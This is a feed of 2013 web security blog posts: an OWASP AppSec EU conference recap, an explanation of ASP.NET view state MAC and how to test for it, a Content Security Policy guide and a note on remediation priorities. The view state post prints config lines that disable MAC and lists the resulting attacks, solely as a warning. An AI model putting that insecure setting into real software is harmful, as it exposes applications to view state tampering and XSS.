The first keynote, provided by Angela Sasse, was a brilliant start to the conference. Angela described how software designers can make a huge difference to security by not trying to force users to change their behaviour. She suggested a top ten list of why users don't follow security advice, and concluded that designers must respect users' time and effort, since complexity is the enemy. As an example she used authentication, where the objective should be "012": zero effort, one step, two factor. She finished her presentation with the suggestion that "Security measures that waste users' time" should be considered for inclusion in the OWASP Top Ten Web Application Security Risks. [video]

PHotograph taken during OWASP AppSec EU Research 2013 showing Michael Coates and Sarah Baso from OWASP

Following this, Michael Coates, chair of the OWASP Board, and Sarah Baso, Executive Director, provided an introduction to OWASP and how volunteering adds value to the community, the individuals themselves and their employers. Everything OWASP produces is free and open. It currently has 198 local chapters in 140 countries, with 36,000 mailing list participants. It is referenced by scores of government and industry standards, guidance and codes of practice. Sarah went on to describe current initiatives, described the sources of income and expenses and announced the candidates for this year's board elections. She also explained there would be an OWASP Project Leaders' workshop first thing the following morning. [video]

Jörg Schwenk provided the second keynote on the topic of cryptography in web applications. He discussed a number of misconceptions and explained why, for example, signing and encrypting cookies do not help. [video]

Photograph taken during OWASP AppSec EU Research 2013 showing Michael Orru' presenting inter protocol exploitation

After the first break of the day, I joined the HackPra Track to hear Michele Orru', co-maintainer of the BeEF project, explain how web vulnerabilities can be used to directly exploit other protocols such as IMAP, SMTP, POP, SIP and IRC using just HTTP requests. Strange but true. [video]

Photograph taken during OWASP AppSec EU Research 2013 showing Paul Stone presenting Precision Timing

Paul Stone described the previously fixed browser CSS history attacks and went on to explain and demonstrate how it is possible to use the Window.requestAnimationFrame() method in a timing attack to determine the contents of pages by examining the source code pixel-by-pixel. Not only did Paul provide a very clear explanation of the method, he illustrated how the attack was optimised in a series of incremental steps to increase confidence in the results and speed up the determination of textual content. He demonstrated how it was possible to extract credentials included in the source code of a page from another domain for example. [video]

Photograph taken during OWASP AppSec EU Research 2013 showing Nicholas Grégoire

After the extensive buffet lunch, I listened to Nicholas Grégoire speaking about tips and tricks for those who use the HTTP proxy Burp Suite Pro. He discussed visualisation of XML and AMF data and extensions for JSON and JavaScript, GUI navigation, contextual buttons, hot keys, history sorting, custom payloads, managing state, the curlit extension, custom iterators, and using Burp with mobile devices. [video]

Continues in Part 2...

AppSecEU Research 2013 Part 1

Clerkendweller

19 Sep 10:00

Understanding (and testing for) view state MAC in ASP.NET web forms

by Troy Hunt

Remember view state? For that matter, do you even remember web forms?! I kid because although MVC is the new hotness in the world of building ASP.NET websites, web forms remains the predominant framework due to both the very long tail of sites already built on it and the prevalence of developers with skills in this area who haven’t made the transition to MVC (indeed some people argue that they can happily cohabit, but that’s another discussion for another day).

Anyway, back to view state. When we entered the world of .NET more than a decade ago now, view state was the smoke and mirrors that turned that stateless HTTP protocol into something that actually persisted data across requests entirely automagically. If, like me, you'd come from a classic ASP world you would have been used to a lot of plumbing going into passing data between requests and manually binding it back up to HTML controls to create the veneer of persistence. View state also made for a much lower friction transition process for folks moving from a win forms world where these problems of persistence didn't exist like they do in the web world. Ok, it could get out of control very quickly and many people bemoaned the (often hefty) overhead it could put on page and request sizes, but it served a purpose.

But there’s one thing about view state that I suspect many people don’t know and even if they’ve messed with it before, may not understand the consequences: MAC. This is actually a very important feature of view state and misusing it can not only leave you vulnerable now but you may very well find it becomes a breaking change in future versions of ASP.NET. Let me explain what it is, why you need it and how to test whether it’s been disabled on a site.

What do Macs have to do with .NET?!

No, not Macs, MACs – Message Authentication Codes. The whole idea of a MAC is to provide assurance as to the authenticity of a message so that the recipient can have confidence that it hasn’t been tampered with. Don’t confuse this with encryption of the message; it’s not about keeping the message private, rather it’s about establishing message integrity and the concept is actually very simple.

Say you have a message on the sender's side and in the case of this blog post, that message is your big whack of view state with data to be persisted between requests. What happens is that the message is combined with a private key then hashed to create the MAC. When the original message is then sent it's accompanied by the MAC. The receiver gets the message, hashes it using the same private key as the sender (this is important as just the one key is involved on both sides), then compares the resultant MAC with the one sent alongside the original message. If they match, the message is intact and if they don't then the receiver knows that someone has been messing with it.
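As a rough illustration of the mechanism (a minimal Python sketch using HMAC-SHA256; ASP.NET's actual view state MAC algorithm and key management differ), the sender appends a keyed hash and the receiver recomputes and compares it:

    import hashlib
    import hmac

    KEY = b"shared-private-key"  # the single key known to both sides

    def protect(message):
        # Append a MAC to the message before sending
        return message + hmac.new(KEY, message, hashlib.sha256).digest()

    def verify(blob):
        # Recompute the MAC and reject the message if it has been tampered with
        message, mac = blob[:-32], blob[-32:]
        expected = hmac.new(KEY, message, hashlib.sha256).digest()
        if not hmac.compare_digest(mac, expected):
            raise ValueError("MAC check failed: message was modified")
        return message

    blob = protect(b"serialized view state")
    print(verify(blob))              # b'serialized view state'
    verify(blob[:-1] + b"X")         # raises ValueError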

Wikipedia has a neat visual explanation of it:

Visual representation of MAC

The relevance of MACs to .NET and view state is simply that it provides a mechanism to ensure that an attacker hasn’t been messing with your view state. Unless you turn it off – that’s the story I really want to talk about here.

Disabling view state MAC (and why you should never, ever, ever do it)

Let’s look at how to turn it off then why you shouldn’t. There are a couple of different approaches, the first is to just disable it site-wide in the web.config:

<pages enableViewStateMac="false" />

The other is to turn it off on an individual page:

<%@ Page EnableViewStateMac="false" %>

Either of those options will put a dead stop to MAC'ing your view state, but why on earth would you ever want to do this?! A common reason would be when transferring requests between machines with different keys: unless the same one is used by both the sender and receiver, an exception will result. Disabling view state MAC hacks around the correct fix, which is simply to sync the keys.

Another scenario might be to accept view state posted from third parties. There’s really not a good use case for this though and it’s a bit of an abomination of what view state was designed to do. I’m sure there are other scenarios as well where the developer has said “Hey, you know what? If we just turn off this security feature then it solves [insert random problem here]”.

So what can you do with view state MAC turned off? Well you can send whatever the hell you want in view state! The damage an attacker can do with this depends on how the view state is used; let's consider some possibilities:

  1. Set their own values in your controls
  2. Change control state
  3. Inject XSS into the page

Think of it like this: anything the page depends on that comes from view state could be compromised. Without MAC, the entire view state becomes “untrusted data” or in other words, expect it to contain nasties injected by an attacker. This might then be weaponised by the attacker tricking the victim into posting invalid view state (a classic social engineering attack often used with reflected XSS) or depending on the nature of the app, an attacker might directly exploit the system themself if that tampered view state is then processed by the server. There are many, many possible exploits here.

What you should be doing with view state MAC

The clearest advice I've seen on this is from Levi Broderick on the ASP.NET team via this Stack Overflow question (his caps – not mine):

It should never be set to false. THERE ARE NO EXCEPTIONS TO THIS RULE.

In that response Levi also says:

The EnableViewStateMac property will be removed in a future version of the product since there is no valid reason to set it to 'false'

Levi then talks about this again in his post on Cryptographic Improvements in ASP.NET 4.5:

Never set EnableViewStateMac to false in production. Not even for a single page. No exceptions! The EnableViewStateMac switch will be removed in a future version.

But what if you’re not even using view state? What’s the harm of disabling MAC then? Barry Dorrans from the Azure team at Microsoft has this to say:

There are cases where, despite your best attempts viewstate may sneak in, under the guise of control state, so the warning still applies.

As he also says, if you’re not using it then what’s the point of disabling MAC in the first place?! There’s a bit of a theme happening here with Microsoft people telling you not to mess with the secure default.

Still not convinced? Damian Edwards (a Program Manager on the ASP.NET team) also touches on it in his talk from NDC earlier this year (20 mins and 35 secs onwards):

Do not disable MAC

Note also that Damian refers to how the EnableViewStateMac setting doesn’t just, well, enable view state MAC. Instead it also has an impact on things like control state and event validation, among others. Wait – what?! Ok, so now you’re starting to get a sense of why Damian is giving people open license to tease the ASP.NET team about ever allowing this in the first place!

He then goes on to say this:

In a future version of .NET we will remove the support for this. If you set this to false we’ll just blow your application up! It is incredibly dangerous.

Understood? Good!

Testing for disabled view state MAC with ASafaWeb

This is a perfect scenario for ASafaWeb to test for because it's already receiving the view state from web forms apps by virtue of the fact that it's embedded in the response to requests the tool is already making. Because the MAC is simply appended to the other data in view state, it's also easy to detect; in fact, there's an online tool that enables you to decode any view state (it's also a good reminder why nothing sensitive should ever go into view state if you're not making use of the viewStateEncryptionMode property and even then, storing this sort of data in there is a really, really bad idea).

Here’s how it works: Firstly, head on over to asafaweb.com and enter the URL of the site you want to scan into the extremely large text box on the home page:

Scanning a site via ASafaWeb

This one is my dedicated insecure test site and after running it you’ll get a bunch of results relating to various aspects of the site’s security profile:

An ASafaWeb scan result

Drill down into the “View State MAC” entry and you’ll see this:

Details of view state MAC validation

That's it! Hopefully you won't see red and you'll either see green for a pass or "Not tested" (usually because it's not an ASP.NET app, it's an MVC app, or view state was encrypted and can't be tested), but if you do see red, fix it right now! For context, since I silently launched this scan a few days ago, about 5% of sites where view state was present and readable had disabled MAC on the view state.

Check your sites folks!

18 Sep 11:27

Security Capabilities Comparison (HSTS & CSP) for Mobile & Desktop Browsers

by Michael Coates
11 Sep 05:01

What CSP Means for Ethical Hacking

by admin


Application Vulnerability Assessments:

What CSP Means for Ethical Hacking

Content Security Policy (CSP) 1.1 is a specification used to control the locations from which an application can load content, as well as to restrict insecure use of JavaScript. By blocking execution of inline JavaScript and dangerous methods such as eval(), setTimeout(), and others, exploitation of many cross-site scripting vulnerabilities can be prevented. It's important to understand that this is in no way intended to be a first line of defense, and should never be used in place of proper input validation. However, in the event that an XSS vulnerability is introduced to an application, CSP may be able to provide a valuable layer of protection to users. CSP 1.1 is still a working draft; however, it is rapidly gaining traction and is already in use by Google, Facebook, and Twitter.

CSP in Ethical Hacking

Many organizations rely on vulnerability assessments to provide a complete security review of their applications. In many cases, we (security professionals) are the only link between the W3C security communities and real-world deployment of the technology. While raising an issue on an assessment because of a non-existent policy may not be appropriate, a note suggesting the application could benefit from one will often be well received.

Inevitably, security professionals should also expect situations where CSP is used in an attempt to mitigate or lower the risk of XSS vulnerabilities. Many application owners may be tempted to use CSP in place of a costly code change. At the time of this writing it is our strong opinion that CSP is not a strong enough control to mitigate risk for XSS or any arbitrary content loading vulnerability.

Policy Delivery

The policy is delivered to the user via a 'Content-Security-Policy' header; CSP 1.1 also contains an experimental meta tag delivery method. Below is an example CSP header:

Content-Security-Policy: default-src 'self'; script-src 'self' cdn.example.com

This header also takes two other forms: X-Content-Security-Policy and X-WebKit-CSP. As browsers mature, the 'X-' prefixed and WebKit-CSP forms will be deprecated. For the best possible support, it is recommended that a policy be delivered with all three headers. Below is an ideal response using all three variations:

Content-Security-Policy: default-src 'self'; script-src 'self' cdn.example.com
X-Content-Security-Policy: default-src 'self'; script-src 'self' cdn.example.com
X-WebKit-CSP: default-src 'self'; script-src 'self' cdn.example.com
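For example (a small sketch assuming a Flask application; adapt it to whatever framework serves your pages), a response hook can attach all three header variants to every page:

    from flask import Flask

    app = Flask(__name__)
    POLICY = "default-src 'self'; script-src 'self' cdn.example.com"

    @app.after_request
    def add_csp_headers(response):
        # Send the standard header plus both prefixed forms for older browsers
        for header in ("Content-Security-Policy",
                       "X-Content-Security-Policy",
                       "X-WebKit-CSP"):
            response.headers[header] = POLICY
        return response

    @app.route("/")
    def index():
        return "<p>Hello</p>"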

Ethical hacking professionals should be aware that if CSP is in use by an application, but is not delivered on particular pages, this likely indicates an oversight by application developers and should be raised as an issue. CSP is effective on a per-page basis, so it cannot prevent an XSS vulnerability if the header is not delivered on a vulnerable page.

Directives

This article will not cover all CSP directives, but we will cover some new and important features which impact many applications.

    • default-src – This specifies a default source list for all other directives. The available options are 'none', 'self', 'all', hostnames, URIs, and schemes (e.g. https). It is recommended to set a restrictive default-src value, and then set more permissive values as needed for other directives.

    • script-src – Controls where script can be loaded from. Two other parameters exist for this directive which can lift the default controls on JavaScript execution.

      • unsafe-inline – Overrides the default CSP restriction of inline JavaScript and allows scripts to be executed from within <script></script> tags.

      • unsafe-eval – Overrides the default restrictions on dangerous JavaScript functions such as eval(), Function, setTimeout(), and setInterval(). Use of unsafe-eval is not recommended; it is strongly advised that code be rewritten in a safe manner before allowing dangerous functions.

      • nonce-[random-value] – This is a recommended alternative to unsafe-inline. The nonce attribute should be supplied with a random value in your policy; the same random value should be added as an attribute to <script></script> tags. Below shows how inline JavaScript can be allowed using this method:

    Content-Security-Policy: default-src 'self'; script-src 'nonce-Nc3n83cnSAd3wc3Sasdfn939hc3'
    […]
    <script nonce="Nc3n83cnSAd3wc3Sasdfn939hc3">
    alert("Allowed because nonce is valid.")
    </script>
    

    • connect-src – Controls where WebSockets, XMLHttpRequests, and Server-Sent Events can connect. This could mitigate a parameter tampering vulnerability if these requests are generated dynamically.

    • reflected-xss (experimental) – This serves as a direct replacement for the X-XSS-Protection header.

    reflected-xss allow    →  X-XSS-Protection: 0
    reflected-xss filter   →  X-XSS-Protection: 1
    reflected-xss block    →  X-XSS-Protection: 1; mode=block
    
Support

    • Chrome – As of version 25, Chrome includes full support for CSP as well as a mandatory subset of features imposed on extensions. Mobile versions also include full unprefixed support.

    • Mozilla Firefox – The experimental header has been supported since version 4; version 23 includes full unprefixed support. Mobile versions support X-Content-Security-Policy only.

    • Safari – CSP is supported through the X-WebKit-CSP header.

    • Internet Explorer – IE 10 supports a (very) limited subset of CSP via the X-Content-Security-Policy header.

In addition to governing JavaScript, CSP has a suite of directives to control where many variations of content are loaded from. This includes images, fonts, audio, video, frames and more.

Reporting

CSP 1.1 introduces reporting capabilities. When a violation of your policy occurs, the user's web browser will send the violation details in JSON format to a destination of your choosing. It should be understood that this does open the door to new abuse cases and should be used with the same caution as any other functional component of your application.
CSP can also operate in "report only" mode, where policies are not enforced, but reports of violations will still be sent to you. This can be very useful for testing a policy before deployment, as it can be difficult to determine just how CSP will affect a large application. To use CSP in this mode, the policy should be delivered via the following header:

    Content-Security-Policy-Report-Only: […]
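To collect those reports (a small sketch assuming a Flask endpoint at a hypothetical /csp-report path, which the policy would name via the report-uri directive), the receiver simply parses the JSON the browser posts:

    from flask import Flask, request

    app = Flask(__name__)

    # The policy would point browsers here, for example:
    #   Content-Security-Policy-Report-Only: default-src 'self'; report-uri /csp-report

    @app.route("/csp-report", methods=["POST"])
    def csp_report():
        # Browsers POST violation details as JSON; log them for later review
        report = request.get_json(force=True, silent=True) or {}
        app.logger.warning("CSP violation: %s", report.get("csp-report", report))
        return "", 204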
    

Policy Generation

Policies will often be best generated by hand, but using a generation tool will give you something to start with. Mal Curtis has a very useful CSP generation tool that can get you started quickly making a policy.

Further reading:
Up to date details for browser support – http://caniuse.com/contentsecuritypolicy
HTML5 Rocks Tutorial – http://www.html5rocks.com/en/tutorials/security/content-security-policy/
Full CSP 1.1 specification working draft – https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html


11 Sep 00:28

Why remediating assessment results might be harmful to your business

by Ehsan Foroughi

Let's say you've just had a pen test or security scan performed on your application. You review the list of findings and get to work on remediation. Apart from the obvious shortcomings of any single assessment technique, you may also be doing a disservice to meeting your business goals. Here's why:

The goal of your assessment is likely to understand the open risks in your application so that you can remediate or otherwise compensate for those risks. In most cases you only have a limited amount of developer time to fix security issues as developers try to juggle building business value with new features. The problem is that by focusing remediation efforts on what a scanner or pen test finds, you are monopolizing precious developer time to fix the issues that technique can find rather than the risks that actually matter to your business.

For example, suppose your scanner identified Missing HttpOnly cookie flag as a finding. At the same time, your scanner was unable to find the kind of basic authorization flaws that grab international headlines, such as the 'delete any photo on Facebook' bug that a researcher found last week. By focusing on the scanner result, you may be spending precious developer time on the cookie flag even though the authorization issue is a much bigger risk to your organization.

A more sensible approach is to start with identifying the risks that you care about, either through automated security requirements analysis, threat modeling, or some other technique. With risks identified, you determine which of those risks your assessment technique is capable of finding and which ones it can't find. Use other techniques to assess the gaps, either by manual testing/code review or – if resources are tight – just asking developers if they do things like perform authorization checks on all API calls. As we've said before, coming up with a list of risks you care about doesn't prevent you from looking for other kinds of vulnerabilities. It does, however, allow you to focus your efforts on the risks which can be harmful to your business since 78% of real incidents are easily preventable.

10 Sep 04:35

51% of security managers believe their applications have vulnerabilities [INFOGRAPHIC]

by Trusted Software Alliance
A recent study by Quotium highlighted some interesting findings as they researched application security from a security manager's point of view. …

Continue reading »